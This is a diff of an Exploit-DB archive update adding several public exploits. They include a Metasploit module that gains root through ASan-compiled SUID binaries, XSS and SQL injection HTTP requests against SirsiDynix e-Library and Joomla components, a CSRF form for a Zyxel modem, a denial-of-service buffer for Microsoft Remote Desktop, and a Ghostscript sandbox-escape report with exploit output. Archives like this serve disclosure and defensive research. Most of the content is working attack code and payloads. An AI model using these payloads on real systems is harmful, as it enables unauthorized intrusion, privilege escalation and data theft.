DB: 2019-01-25

10 changes to exploits/shellcodes

Microsoft Remote Desktop 10.2.4(134) - Denial of Service (PoC)

AddressSanitizer (ASan) - SUID Executable Privilege Escalation (Metasploit)

Ghostscript 9.26 - Pseudo-Operator Remote Code Execution
Joomla! Component J-CruisePortal 6.0.4 - SQL Injection
Joomla! Component JHotelReservation 6.0.7 - SQL Injection
SimplePress CMS 1.0.7 - SQL Injection
SirsiDynix e-Library 3.5.x - Cross-Site Scripting
Splunk Enterprise 7.2.3 - Authenticated Custom App RCE
ImpressCMS 1.3.11 - 'bid' SQL Injection
Zyxel NBG-418N v2 Modem 1.00(AAXM.6)C0 - Cross-Site Request Forgery

exploits/cgi/webapps/46237.txt

@@ -0,0 +1,42 @@
+# Exploit Title: SirsiDynix e-Library <= 3.5.x - Cross-Site Scripting
+# CVE: CVE-2018-20503
+# Date: 2019-24-01
+# Google Dork: inurl:/x/x/0/49
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Contact: https://pentest.com.tr
+# Vendor Homepage: http://www.sirsidynix.com
+# Version: 3.5.x
+# Category: Webapps
+# Tested on: Firefox/52 and Chrome/69
+# Software Description : As SirsiDynix Symphony’s core discovery portal,
+e-Library gives
+# Symphony users the basic tools they need to find the resources they seek.
+# e-Library offers users speedy and relevant search results as well as a
+user-friendly interface to make discovery simple
+# Description : Exploiting these issues could allow an attacker to steal
+cookie-based authentication credentials,
+# compromise the application, access or modify data, or exploit latent
+vulnerabilities in the underlying database.
+# SirsiDynix e-Library 3.5.x is vulnerable; prior versions may also be
+affected.
+# ==================================================================
+
+# PoC:
+
+# POST Request (sort_by):
+
+POST /uhtbin/cgisirsi/?ps=0Sk8zSpD0f/MAIN/33660028/123 HTTP/1.1
+Host: target
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://target/uhtbin/cgisirsi/?ps=mmRoXTc0L3/MAIN/33660028/38/1/X/BLASTOFF
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 146
+
+searchdata1=test&srchfield1=AU%5EAUTHOR%5EAUTHORS%5EAuthor+Processing%5EYazar&library=VLK&srch_history=--%C3%96nceki+soruyu+se%C3%A7--&sort_by=ANYhadvi%22%3e%3cscript%3ealert(1)%3c%2fscript%3eox0ix
+
+==================================================================

exploits/hardware/webapps/46240.html

@@ -0,0 +1,22 @@
+<!--
+# Exploit Title: Zyxel NBG-418N v2 Modem CSRF Exploit & PoC
+# Version: Zyxel NBG-418N v2 - V1.00(AAXM.6)C0
+# Tested on: Windows 10 x64
+# CVE : CVE-2019-6710
+# Author : Ali Can Gönüllü
+# Twitter : @god3err
+
+Exploits :
+-->
+
+<html><head>
+<title>NBG-418N v2 Modem CSRF Exploit & PoC</title>
+</head><body>
+<form action="http://10.0.0.1/login.cgi" method="POST">
+<input type="text" name="username" id="username" value="admin" /><br />
+<input type="text" name="password" id="password" value="1234" /><br />
+<input id="loginBtn" onclick="return onlogin()" type='submit' 
+value='Go!' />
+<input type="hidden" name="submit.htm?login.htm" value="Send">
+</form>
+</body></html>

exploits/linux/local/46241.rb

@@ -0,0 +1,292 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'AddressSanitizer (ASan) SUID Executable Privilege Escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges on Linux systems using
+        setuid executables compiled with AddressSanitizer (ASan).
+
+        ASan configuration related environment variables are permitted when
+        executing setuid executables built with libasan. The `log_path` option
+        can be set using the `ASAN_OPTIONS` environment variable, allowing
+        clobbering of arbitrary files, with the privileges of the setuid user.
+
+        This module uploads a shared object and sprays symlinks to overwrite
+        `/etc/ld.so.preload` in order to create a setuid root shell.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Szabolcs Nagy', # Discovery and PoC
+          'infodox',       # unsanitary.sh Exploit
+          'bcoles'         # Metasploit
+        ],
+      'DisclosureDate' => '2016-02-17',
+      'Platform'       => 'linux',
+      'Arch'           =>
+        [
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'Targets'        => [['Auto', {}]],
+      'DefaultOptions' =>
+        {
+          'AppendExit'       => true,
+          'PrependSetresuid' => true,
+          'PrependSetresgid' => true,
+          'PrependFork'      => true
+        },
+      'References'     =>
+        [
+          ['URL', 'https://seclists.org/oss-sec/2016/q1/363'],
+          ['URL', 'https://seclists.org/oss-sec/2016/q1/379'],
+          ['URL', 'https://gist.github.com/0x27/9ff2c8fb445b6ab9c94e'],
+          ['URL', 'https://github.com/bcoles/local-exploits/tree/master/asan-suid-root']
+        ],
+      'Notes' =>
+        {
+          'AKA' => ['unsanitary.sh']
+        },
+      'DefaultTarget'  => 0))
+    register_options [
+      OptString.new('SUID_EXECUTABLE', [true, 'Path to a SUID executable compiled with ASan', '']),
+      OptInt.new('SPRAY_SIZE', [true, 'Number of PID symlinks to create', 50])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit',  [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir']
+  end
+
+  def suid_exe_path
+    datastore['SUID_EXECUTABLE']
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def upload_and_chmodx(path, data)
+    upload path, data
+    chmod path
+  end
+
+  def upload_and_compile(path, data, gcc_args='')
+    upload "#{path}.c", data
+
+    gcc_cmd = "gcc -o #{path} #{path}.c"
+    if session.type.eql? 'shell'
+      gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
+    end
+
+    unless gcc_args.to_s.blank?
+      gcc_cmd << " #{gcc_args}"
+    end
+
+    output = cmd_exec gcc_cmd
+
+    unless output.blank?
+      print_error 'Compiling failed:'
+      print_line output
+    end
+
+    register_file_for_cleanup path
+    chmod path
+  end
+
+  def check
+    unless setuid? suid_exe_path
+      vprint_error "#{suid_exe_path} is not setuid"
+      return CheckCode::Safe
+    end
+    vprint_good "#{suid_exe_path} is setuid"
+
+    # Check if the executable was compiled with ASan
+    #
+    # If the setuid executable is readable, and `ldd` is installed and in $PATH,
+    # we can detect ASan via linked libraries. (`objdump` could also be used).
+    #
+    # Otherwise, we can try to detect ASan via the help output with the `help=1` option.
+    # This approach works regardless of whether the setuid executable is readable,
+    # with the obvious disadvantage that it requires invoking the executable.
+    if cmd_exec("test -r #{suid_exe_path} && echo true").to_s.include?('true') && command_exists?('ldd')
+      unless cmd_exec("ldd #{suid_exe_path}").to_s.include? 'libasan.so'
+        vprint_error "#{suid_exe_path} was not compiled with ASan"
+        return CheckCode::Safe
+      end
+    else
+      unless cmd_exec("ASAN_OPTIONS=help=1 #{suid_exe_path}").include? 'AddressSanitizer'
+        vprint_error "#{suid_exe_path} was not compiled with ASan"
+        return CheckCode::Safe
+      end
+    end
+    vprint_good "#{suid_exe_path} was compiled with ASan"
+
+    unless has_gcc?
+      print_error 'gcc is not installed. Compiling will fail.'
+      return CheckCode::Safe
+    end
+    vprint_good 'gcc is installed'
+
+    CheckCode::Appears
+  end
+
+  def exploit
+    unless check == CheckCode::Appears
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+      end
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    unless writable? pwd.to_s.strip
+      fail_with Failure::BadConfig, "#{pwd.to_s.strip} working directory is not writable"
+    end
+
+    if nosuid? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
+    end
+
+    @log_prefix = ".#{rand_text_alphanumeric 5..10}"
+
+    payload_name = ".#{rand_text_alphanumeric 5..10}"
+    payload_path = "#{base_dir}/#{payload_name}"
+    upload_and_chmodx payload_path, generate_payload_exe
+
+    rootshell_name = ".#{rand_text_alphanumeric 5..10}"
+    @rootshell_path = "#{base_dir}/#{rootshell_name}"
+    rootshell = <<-EOF
+#include <stdio.h>
+#include <sys/stat.h>
+#include <unistd.h>
+int main(void)
+{
+  setuid(0);
+  setgid(0);
+  execl("/bin/bash", "bash", NULL);
+}
+    EOF
+    upload_and_compile @rootshell_path, rootshell, '-Wall'
+
+    lib_name = ".#{rand_text_alphanumeric 5..10}"
+    lib_path = "#{base_dir}/#{lib_name}.so"
+    lib = <<-EOF
+#include <stdlib.h>
+#include <stdio.h>
+#include <sys/stat.h>
+#include <unistd.h>
+void init(void) __attribute__((constructor));
+void __attribute__((constructor)) init() {
+  if (setuid(0) || setgid(0))
+    _exit(1);
+  unlink("/etc/ld.so.preload");
+  chown("#{@rootshell_path}", 0, 0);
+  chmod("#{@rootshell_path}", 04755);
+  _exit(0);
+}
+    EOF
+    upload_and_compile lib_path, lib, '-fPIC -shared -ldl -Wall'
+
+    spray_name = ".#{rand_text_alphanumeric 5..10}"
+    spray_path = "#{base_dir}/#{spray_name}"
+    spray = <<-EOF
+#include <stdio.h>
+#include <sys/stat.h>
+#include <unistd.h>
+int main(void)
+{
+  pid_t pid = getpid();
+  char buf[64];
+  for (int i=0; i<=#{datastore['SPRAY_SIZE']}; i++) {
+    snprintf(buf, sizeof(buf), "#{@log_prefix}.%ld", (long)pid+i);
+    symlink("/etc/ld.so.preload", buf);
+  }
+}
+    EOF
+    upload_and_compile spray_path, spray, '-Wall'
+
+    exp_name = ".#{rand_text_alphanumeric 5..10}"
+    exp_path = "#{base_dir}/#{exp_name}"
+    exp = <<-EOF
+#!/bin/sh
+#{spray_path}
+ASAN_OPTIONS="disable_coredump=1 suppressions='/#{@log_prefix}
+#{lib_path}
+' log_path=./#{@log_prefix} verbosity=0" "#{suid_exe_path}" >/dev/null 2>&1
+ASAN_OPTIONS='disable_coredump=1 abort_on_error=1 verbosity=0' "#{suid_exe_path}" >/dev/null 2>&1
+    EOF
+    upload_and_chmodx exp_path, exp
+
+    print_status 'Launching exploit...'
+    output = cmd_exec exp_path
+    output.each_line { |line| vprint_status line.chomp }
+
+    unless setuid? @rootshell_path
+      fail_with Failure::Unknown, "Failed to set-uid root #{@rootshell_path}"
+    end
+    print_good "Success! #{@rootshell_path} is set-uid root!"
+    vprint_line cmd_exec "ls -la #{@rootshell_path}"
+
+    print_status 'Executing payload...'
+    cmd_exec "echo #{payload_path} | #{@rootshell_path} & echo "
+  end
+
+  def cleanup
+    # Safety check to ensure we don't delete everything in the working directory
+    if @log_prefix.to_s.strip.eql? ''
+      vprint_warning "#{datastore['SPRAY_SIZE']} symlinks may require manual cleanup in: #{pwd}"
+    else
+      cmd_exec "rm #{pwd}/#{@log_prefix}*"
+    end
+  ensure
+    super
+  end
+
+  def on_new_session(session)
+    # Remove rootshell executable
+    if session.type.eql? 'meterpreter'
+      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
+      session.fs.file.rm @rootshell_path
+    else
+      session.shell_command_token "rm -f '#{@rootshell_path}'"
+    end
+  ensure
+    super
+  end
+end

exploits/linux/remote/46242.txt

@@ -0,0 +1,264 @@
+I noticed ghostscript 9.26 was released, so had a quick look and spotted some errors. For background, this is how you define a subroutine in postscript:
+
+/hello {
+    (hello\n) print
+} def
+
+That's simple enough, but because a subroutine is just an executable array of commands, you need to mark it as executeonly if you're using system operators. That way, users can't peek inside and get references to operators they shouldn't be allowed to use.
+
+/hello {
+    (hello\n) print
+} executeonly def
+
+That's still not enough though, because the routine might expose the contents to error handlers, so you also need to make it a pseudo-operator with odef. PostScript error handlers don't examine any deeper than the current operator (or pseudo-operator), so won't expose any of the contents if they stop.
+
+/hello {
+    (hello\n) print
+} executeonly odef
+
+Looks good, but it gets weirder. If you don't bind the contents, then name resolution happens on execution, not when you define it. That means that someone can change the dictstack (which kind of works like variable scope in other languages) so that commands and operators do something different than when you defined the subroutine.
+
+Like this:
+
+GS>/hello {
+    (hello\n) print
+} executeonly odef
+GS><< /print { (goodbye) == pop } >> begin          
+GS>hello
+(goodbye)
+
+This means you also need to bind the routine, and also be very aware when you're writing it of what cannot be resolved at define-time (nobody ever said writing postscript was easy, lol). So now we have this:
+
+/hello {
+    (hello\n) print
+} bind executeonly odef
+
+I think that's good enough for simple routines, but what if it's more complicated? The way you branch in PostScript is to create an ephemeral subroutine and pass it to the `if` or `ifelse` operators, like this:
+
+/hello {
+    time 1200 lt {
+        (good morning\n) print
+    } {
+        (good afternoon\n) print
+    } ifelse
+} bind executeonly odef
+
+Do those ephemeral routines also need to be protected? The answer is yes, they're pushed on the operand stack just like everything else, so can cause /stackoverflow or /execstackoverflow errors, and will then be exposed to error handlers.
+
+Ghostscript didn't protect a whole bunch of these ephemeral routines, here is one example:
+
+1123       {
+1124         currentglobal pdfdict gcheck .setglobal
+1125         pdfdict /.Qqwarning_issued //true .forceput
+1126         .setglobal
+1127         pdfformaterror
+1128       } ifelse
+
+You can see the routine itself is bound, executeonly and odef, but the ephemeral routines inside it used for conditions and loops are not protected.
+
+These bugs are starting to get trickier to exploit, you have to make an operator fail very precisely, but I made a demo that works in 9.26. This uses the trick I described above of taking over names that couldn't be resolved at define time by pushing a new dict on the dictstack. This gives me a high degree of control over the routine.
+
+$ gs -dSAFER -f ghostscript-926-forceput.ps 
+GPL Ghostscript GIT PRERELEASE 9.27 (2018-11-20)
+Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
+This software comes with NO WARRANTY: see the file PUBLIC for details.
+(Stage 0: PDFfile)
+(Stage 1: q)
+(Stage 3: oget)
+(Stage 4: pdfemptycount)
+(Stage 5: gput)
+(Stage 6: resolvestream)
+(Stage 7: pdfopdict)
+(Stage 8: .pdfruncontext)
+(Stage 9: pdfdict)
+(Stage 10: /stackoverflow)
+(   Last Parameter:){(\n   **** Error: File has unbalanced q/Q operators \(too many q's\)\n               Output may be incorrect.\n) pdfdict /.Qqwarning_issued --.knownget-- {{--pop--} {--.currentglobal-- pdfdict --scheck-- --.setglobal-- pdfdict /.Qqwarning_issued true --.forceput-- --.setglobal-- pdfformaterror} --ifelse--} {--.currentglobal-- pdfdict --scheck-- --.setglobal-- pdfdict /.Qqwarning_issued true --.forceput-- --.setglobal-- pdfformaterror} --ifelse--}
+(   Extracting .forceput...)
+(   Result:)--.forceput--
+(Stage 11: Exploitation...)
+(   Should now have complete control over ghostscript, attempting to read /etc/passwd...)
+(root:x:0:0:root:/root:/bin/bash)
+(All Done)
+$ tail -1 ~/.bashrc 
+echo pwned by postscript
+
+This exploit should work via evince, ImageMagick, nautilus, less, gimp, gv, etc, etc. It might require some adjustment to work on older versions, because it requires precise alignment of the operand stack, but 9.26 and earlier are all affected.
+
+p.s. I'm not regularly looking at ghostscript, this was just a random look at the new release. 
+
+#DeprecateUntrustedPostscript
+
+################################################################################
+
+Project Member Comment 2 by taviso@google.com, Dec 4
+I noticed someone point out on twitter that the default $LESSOPEN can invoke ImageMagick:
+
+https://twitter.com/jensvoid/status/1065948452872511488
+
+Naturally, that works with this too (just name the exploit foo.pcd)
+
+################################################################################
+
+Project Member Comment 3 by taviso@google.com, Dec 4
+This is ghostscript bug 700317
+
+################################################################################
+
+Project Member Comment 5 by taviso@google.com, Dec 12
+Artifex sent me a proposed patch to review, but their patch only fixed the vulnerability for /stackoverflow. I did use /stackoverflow in the testcase, but as I mentioned in the report, any error will do.
+
+I updated the exploit to use /typecheck instead, and sent it to them with an explanation of why the patch was insufficient.
+
+Artifex also informed me that they plan to sit on their patch for the full 90 days, and will not commit it to git or release it. I consider this a bad faith gaming of our disclosure policy, which is astonishing for an open source company.
+ 
+Ghostscript vulnerabilities have been discovered exploited in the wild in the past (e.g. http://ghostbutt.com/), sitting on exploits with patches available for months is really unacceptable. I know that Artifex commercial customers are already cc'd on the ghostscript bug tracker, which makes this even harder to stomach.
+
+$ ./gs -dSAFER -sDEVICE=ppmraw -sOutputFile=/dev/null -f ghostscript-926-forceput-typecheck-example.ps 
+GPL Ghostscript GIT PRERELEASE 9.27 (2018-11-20)
+Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
+This software comes with NO WARRANTY: see the file PUBLIC for details.
+(Stage 0: PDFfile)
+(Stage 1: q)
+(Stage 3: oget)
+(Stage 4: pdfemptycount)
+(Stage 5: gput)
+(Stage 6: resolvestream)
+(Stage 7: pdfopdict)
+(Stage 8: .pdfruncontext)
+(Stage 9: pdfdict)
+Stage 10: /typecheck #1
+Stage 10: /typecheck #2
+(Stage 11: Exploitation...)
+(   Should now have complete control over ghostscript, attempting to read /etc/passwd...)
+(root:x:0:0:root:/root:/bin/bash)
+
+################################################################################
+
+Project Member Comment 6 by taviso@google.com, Dec 14
+Artifex sent me a new proposed patch to review, this one changes all branches in system routines to look like this:
+
+/blah {
+    {
+      foo
+    } executeonly {
+      bar
+    } executeonly ifelse
+} def
+
+That solution doesn't work, because it doesn't stop you extracting the routine, waiting for the stack to unwind then executing it outside pseudo-op context. That allows the error handler to access internals, so you just cause random errors and extract any contents you like. (I'm aware this is really getting into the postscript weeds, but basically "just" being executeonly is useless). Here is an updated exploit that works with executeonly branches.
+
+$ ./gs -dSAFER -sDEVICE=ppmraw -sOutputFile=/dev/null -f ghostscript-926-forceput-typecheck-executeonly-example.ps 
+GPL Ghostscript GIT PRERELEASE 9.27 (2018-11-20)
+Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
+This software comes with NO WARRANTY: see the file PUBLIC for details.
+(Stage 0: PDFfile)
+(Stage 1: q)
+(Stage 3: oget)
+(Stage 4: pdfemptycount)
+(Stage 5: gput)
+(Stage 6: resolvestream)
+(Stage 7: pdfopdict)
+(Stage 8: .pdfruncontext)
+(Stage 9: pdfdict)
+Stage 10: /typecheck #1
+Stage 10: /typecheck #2
+(Stage 9: pdfdict)
+(Stage 9: pdfdict)
+Stage 10: /typecheck #3
+(Stage 11: Exploitation...)
+(   Should now have complete control over ghostscript, attempting to read /etc/passwd...)
+(root:x:0:0:root:/root:/bin/bash)
+
+I sent this to Artifex and explained why their solution wont work.
+
+I *think* the branches need to be named and pseudo-ops, but that will be really ugly and I doubt Artifex will implement that, more likely they will make an interpreter change.
+
+################################################################################
+
+Project Member Comment 7 by taviso@google.com, Dec 17
+Artifex sent me a new patch that changes how the $error dict works, instead of getting a reference to the failing operator, you get a name object (i.e. /--foo-- instead of --foo--).
+
+I *think* this works, but if any ephemeral routine can be run in an unexpected context, it might be a security issue. Artifex says they're going to manually check for any that look dangerous, but in my opinion it will take a while to iron out all possible attack vectors.
+
+I think this is a major change and requires some thought, even if I can't immediately think of a way to break it (other than the unexpected context thing).
+Project Member Comment 8 by taviso@google.com, Jan 7
+Artifex sent me a patch with more checking for abusable procedures (i.e. routines that are useful in an unexpected context), hiding some that are hard to reason about. I spent a morning double checking for any more that they had missed and found one in gs_fonts.ps:
+
+1105         dup 3 index .fontknownget
+1106          { dup /PathLoad 4 index //.putgstringcopy
+1107            4 1 roll pop pop pop //true exit
+1108          } if
+1109 
+
+
+.putgstringcopy is a dangerous operator, basically just a wrapper around .forceput. I wrote a quick demo that is able to extract a reference, and mailed it to Artifex.
+
+$ ./gs -dSAFER -sDEVICE=ppmraw -f example.ps 
+GPL Ghostscript GIT PRERELEASE 9.27 (2018-11-20)
+Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
+This software comes with NO WARRANTY: see the file PUBLIC for details.
+{--dup-- /PathLoad 4 --index-- --.putgstringcopy-- 4 1 --roll-- --pop-- --pop-- --pop-- true --exit--}
+--.putgstringcopy--
+
+I checked pretty thoroughly, and this is the only one I could find that they had missed - but a lot of the code is quite hard to reason about, so I'm not sure there are no more.
+
+################################################################################
+
+Project Member Comment 9 by taviso@google.com, Jan 8
+Artifex sent me a patch that makes that executeonly, but not the containing procedures as well, so I could still make them fail.
+
+e.g. this one in gs_fonts.ps:
+
+1137             } executeonly
+1138            if pop % Stack: origfontname fontdirectory path
+1139          }
+1140         if pop pop  % Stack: origfontname
+
+It doesn't matter that the inner one is executeonly, because if the outer one fails that one never gets called.
+
+$ ./gs -dSAFER -sDEVICE=ppmraw -sOutputFile=/dev/null -f font.ps 
+GPL Ghostscript GIT PRERELEASE 9.27 (2018-11-20)
+Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
+This software comes with NO WARRANTY: see the file PUBLIC for details.
+.loadfont
+(.fontknownget, force /typecheck)
+--.forceundef-- operatortype
+GS>
+
+I sent an explanation to Artifex on why containing procedures also need to be fixed. I'm spending way too much time reviewing patches for this one bug, untrusted postscript needs to be deprecated asap.
+Project Member Comment 10 by taviso@google.com, Jan 9
+I got a new patchset from Artifex, this one has a set of five patches which should fix this bug. I've attached them for reference.
+
+################################################################################
+
+Project Member Comment 11 by taviso@google.com, Jan 9
+I think this patchset seems comprehensive, in summary:
+
+- Replaces references to operators with name objects in saved stacks for error handlers.
+- Makes all ephemeral procedures that contain dangerous operators executeonly, and any outer procedures. This isn't automated, they are manually changing the postscript.
+- Changes how error handlers behave in executeonly procedures so that faulting operators don't leak.
+- Rewrite a lot of code so less pseudo-operators are exposed to users, especially some that are complicated and hard to reason about.
+
+I think this will work, although it's hard to be confident they found all the transient routines - postscript is really hard to read.
+
+Assuming they found them all, this still requires that developers don't accidentally add new branches in any of the postscript and forget to make them executeonly, which seems like a very easy mistake to make.
+
+I asked if they would consider making dangerous operators search the estack for any non-executeonly routines, perhaps only for test runs - just to make sure future changes don't re-introduce this. Let's see what they say, it seems like a pretty simple change to me.
+Project Member Comment 12 by taviso@google.com, Jan 10
+Filed https://bugs.ghostscript.com/show_bug.cgi?id=700472 to cover regression tests:
+
+-----
+When bug 700317 is fixed, it will be important that any future changes to postscript resources don't introduce any new conditions or other control structures that aren't executeonly.
+
+This seems like a really easy mistake to make, just changing an if into an ifelse, or adding another test could introduce a vulnerability.
+
+I wonder if some of the dangerous routines, like .forceput and so on, could search the e_stack every time they're called to verify there are no non-executeonly routines on the call stack.
+
+I suppose this is only necessary for test-cluster runs, just to make sure nobody accidentally breaks the security guarantees. Just looking at count_exec_stack() in zcontrol.c, it seems like the code would be really simple.
+
+Just filing this enhancement request to think about this (or some other solution).
+-----
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46242.zip

exploits/macos/dos/46236.py

@@ -0,0 +1,24 @@
+# Exploit Title: Microsoft Remote Desktop 10.2.4(134) - Denial of Service (PoC)
+# Date: 2019/01/24
+# Author: Saeed Hasanzadeh (Net.Hun73r)
+# Twitter: @nethun73r
+# Software Link: https://itunes.apple.com/us/app/microsoft-remote-desktop-10/id1295203466?mt=12
+# Version: 10.2.4(134)
+# Tested on: Mac OS Mojave(10.14.2)
+
+# Proof of Concept:
+# Run the python script, it will create a new file "PoC.txt"
+# Copy the text from the generated PoC.txt file to clipboard
+# Paste the text in the add Desktop > add user account >UserName
+# App will now crash
+
+buffer = "A" * 600
+payload = buffer
+try:
+    f=open("PoC.txt","w")
+    print "[+] Creating %s evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/php/webapps/46233.txt

@@ -0,0 +1,42 @@
+# Exploit Title: Joomla! Component J-CruisePortal 6.0.4 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-23
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://cmsjunkie.com/
+# Software Link: https://www.cmsjunkie.com/joomla-cruise-reservation-portal
+# Version: 6.0.7
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/cruises
+# 
+
+POST /[PATH]/cruises/cruises HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 518
+Cookie: __cfduid=d35dbe4de0d461bf69a9165df0f9691951548240991; 79a1b3ae870a3fab009030106c9fb887=eeab77f1b87057d5ad12b61071048ad6; PHPSESSID=c1088ee33a3f4770dd333f9605b9e44f; 704a7cf3f453ec2db97de2f28ef169f8=fb9a121113ff0e6cc6da546a82f2452e; 398e9ff8e95a4e22822ceef0b6c44a4a=a94f101ca5d3b159ceea66309ea3a951; joomla_user_state=logged_in; 886feb4c8becc9e8152c352c36facdb9=0a4cabcc031321270d6811b7ab5222b0
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+controller=search&task=searchCruises&year_start=2019&month_start=01&day_start=23&year_end=2019&month_end=01&cruise_id=&day_end=24&rooms=1&guest_adult=2%20%20%2f%2a%21%31%31%31%31%31%61%6e%44%2a%2f%20%73%6c%65%65%70%28%35%29&guest_child=0&filterParams=&resetSearch=1&searchType=&searchId=&room-guests%5B%5D=2&room-guests-children%5B%5D=0&keyword=&jcruisereservation_datas=01%2F23%2F2019&jcruisereservation_datae=01%2F24%2F2019&jcruisereservation_rooms=1&jcruisereservation_guest_adult=2&jcruisereservation_guest_child=0: undefined
+HTTP/1.1 200 OK
+Date: Wed, 23 Jan 2019 16:42:13 GMT
+Content-Type: text/html; charset=utf-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
+Expires: Wed, 17 Aug 2005 00:00:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Last-Modified: Wed, 23 Jan 2019 16:42:13 GMT
+Alt-Svc: h2=":443"; ma=60
+Server: cloudflare
+CF-RAY: 49dbb4e4622dc7e8-DFW

exploits/php/webapps/46234.txt

@@ -0,0 +1,39 @@
+# Exploit Title: Joomla! Component JHotelReservation 6.0.7 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-23
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://cmsjunkie.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/jhotelreservation/
+# Version: 6.0.7
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/j-myhotel/search-hotels?view=hotels
+# 
+
+POST /[PATH]/j-myhotel/search-hotels?view=hotels HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: __cfduid=d7fe0824bc450154b7edd5f562e512afc1548262808; c9ffd68b334eb414c880fa254194ecbb=11aaa3e0c1191242b5a84d567379c503; PHPSESSID=75e6cfdbe3676f9393a6114534ed9845
+Alt-Used: TARGET:443
+Connection: keep-alive
+Content-Tye: application/x-www-form-urlencoded
+Content-Length: 965
+task=hotels.searchHotels&year_start=2019&month_start=01&day_start=23&year_end=2019&month_end=01&hotel_id=&day_end=24&rooms=1%20%2f%2a%21%31%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%31%31%31%31%31%53%45%4c%45%43%54%2a%2f%20%31%2c%76%65%72%73%69%6f%6e%28%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2c%33%32%2c%33%33%2c%33%34%2c%33%35%2c%33%36%2c%33%37%2c%33%38%2c%33%39%2c%34%30%2c%34%31%2c%34%32%2c%34%33%2c%34%34%2d%2d%20%2d&guest_adult=2&guest_child=0&filterParams=facilityId%3D1&resetSearch=0'&searchType=&searchId=&priceLow=&priceHigh=&room-guests%5B%5D=2&room-guests-children%5B%5D=0&keyword=Paris&jhotelreservation_datas=23-01-2019&jhotelreservation_datae=24-01-2019&jhotelreservation_rooms=1&jhotelreservation_guest_adult=2&jhotelreservation_guest_child=0
+HTTP/2.0 200 OK
+Date: Wed, 23 Jan 2019 17:04:10 GMT
+Content-Type: text/html; charset=utf-8
+Expires: Wed, 17 Aug 2005 00:00:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Last-Modified: Wed, 23 Jan 2019 17:04:10 GMT
+Server: cloudflare
+CF-RAY: 49dbd67c5d91c820-DFW
+Content-Encoding: gzip
+X-Firefox-Spdy: h2

exploits/php/webapps/46235.txt

@@ -0,0 +1,64 @@
